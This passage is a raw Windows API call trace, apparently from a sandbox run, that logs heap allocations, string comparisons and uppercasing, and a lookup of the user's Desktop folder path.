returned 0x2a71f88 [0090.195] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71db8 [0090.195] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0090.195] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0090.195] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71de8 [0090.196] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71e88 [0090.196] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71e88 | out: hHeap=0x2af0000) returned 1 [0090.196] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0090.196] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71de8 | out: hHeap=0x2af0000) returned 1 [0090.196] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0090.196] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71e88 [0090.196] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0090.196] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71e88 | out: hHeap=0x2af0000) returned 1 [0090.196] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="E hy.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0090.196] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" hy.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0090.196] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hy.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0090.196] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="y.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0090.196] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0090.196] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0090.196] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9058 | out: hHeap=0x2af0000) returned 1 [0090.196] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9040 | out: hHeap=0x2af0000) returned 1 [0090.196] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0090.196] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0090.196] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f88 | out: hHeap=0x2af0000) returned 1 [0090.196] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ecc0 [0090.196] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0090.196] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71f88 [0090.196] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0090.196] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0090.196] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71db8 [0090.196] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ec8 [0090.196] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0090.196] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0090.196] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0090.196] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0090.196] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71db8 [0090.197] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0090.197] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0090.197] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0090.197] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71db8 [0090.197] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0090.197] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0090.197] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0090.197] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71e88 [0090.197] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x12) returned 0x29f6e80 [0090.197] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71db8 [0090.197] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="E hy.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0090.197] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" hy.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0090.197] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hy.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0090.197] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0090.197] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0090.197] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0090.197] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b20 | out: hHeap=0x2af0000) returned 1 [0090.197] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71e88 | out: hHeap=0x2af0000) returned 1 [0090.197] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9058 | out: hHeap=0x2af0000) returned 1 [0090.197] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0090.197] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0090.197] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0090.197] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0090.197] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0090.197] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0090.197] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f88 | out: hHeap=0x2af0000) returned 1 [0090.197] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a69b20 | out: hHeap=0x2af0000) returned 1 [0090.197] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0090.197] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0090.197] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9328 [0090.197] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0090.197] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0090.198] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0090.198] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72698 [0090.198] CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: lpsz="A2100602512") returned 0xb [0090.198] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b20 | out: hHeap=0x2af0000) returned 1 [0090.198] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0090.198] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0090.198] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72698 [0090.198] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0090.198] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0090.198] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0090.198] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0090.198] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0090.198] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0090.198] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0090.198] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0090.198] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a68440 [0090.198] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72778 [0090.198] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0090.198] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0090.198] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0090.198] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9268 [0090.198] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0090.198] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0090.198] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa92c8 [0090.198] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0090.198] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf3a8 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0090.198] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0090.198] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2aa6568 [0090.198] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72718 [0090.198] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0090.199] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0090.199] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0090.199] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0090.199] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0090.199] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0090.199] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0090.199] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9040 | out: hHeap=0x2af0000) returned 1 [0090.199] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0090.199] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0090.199] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0090.199] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f60 [0090.199] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0090.199] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x2a75df8 [0090.199] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa6568 | out: hHeap=0x2af0000) returned 1 [0090.199] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0090.199] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0090.199] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0090.199] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0090.199] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0090.199] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f60 | out: hHeap=0x2af0000) returned 1 [0090.199] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0090.199] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0090.199] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72628 [0090.199] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0090.199] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0090.199] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0090.199] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0090.199] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0090.199] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0090.199] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0090.200] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a68440 [0090.200] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72648 [0090.200] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0090.200] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0090.200] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0090.200] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa91c0 [0090.200] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0090.200] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0090.200] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9310 [0090.200] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0090.200] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf3a8 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0090.200] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0090.200] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2aa6760 [0090.200] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72738 [0090.200] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0090.200] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0090.200] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0090.200] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0090.200] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0090.200] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0090.200] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0090.200] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0090.200] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9058 | out: hHeap=0x2af0000) returned 1 [0090.200] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0090.200] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0090.200] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7100 [0090.200] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0090.200] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x80) returned 0x2a68440 [0090.200] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa6760 | out: hHeap=0x2af0000) returned 1 [0090.200] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0090.200] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0090.201] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0090.201] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7100 | out: hHeap=0x2af0000) returned 1 [0090.201] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0090.201] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0090.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72648 [0090.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0090.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0090.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0090.201] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0090.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72748 [0090.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0090.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0090.201] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0090.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9220 [0090.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0090.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0090.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a726a8 [0090.201] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0090.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e68 [0090.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0090.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0090.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0090.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0090.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72778 [0090.201] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0090.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0090.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0090.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0090.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0090.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0090.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72708 [0090.202] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0090.202] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0090.202] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0090.202] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0090.202] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0090.202] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0090.202] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a728f8 [0090.202] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0090.202] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0090.202] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0090.202] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0090.202] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0090.202] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b08 [0090.202] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72aa8 [0090.202] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0090.202] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0090.202] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b18 [0090.202] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0090.202] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0090.202] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a58 [0090.202] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0090.202] CharUpperBuffW (in: lpsz="SSA2100602512", cchLength=0xd | out: lpsz="SSA2100602512") returned 0xd [0090.202] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77bc0 | out: hHeap=0x2af0000) returned 1 [0090.202] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0090.202] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0090.202] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0090.202] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0090.202] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0090.202] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0090.202] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e6c0 [0090.202] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0090.203] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e6c0 | out: hHeap=0x2af0000) returned 1 [0090.203] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0090.203] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0090.203] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b58 [0090.203] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0090.203] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0090.203] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0090.203] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0090.203] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b08 [0090.203] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0090.203] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0090.203] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a08 [0090.203] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0090.203] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0090.203] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0090.203] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0090.203] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, 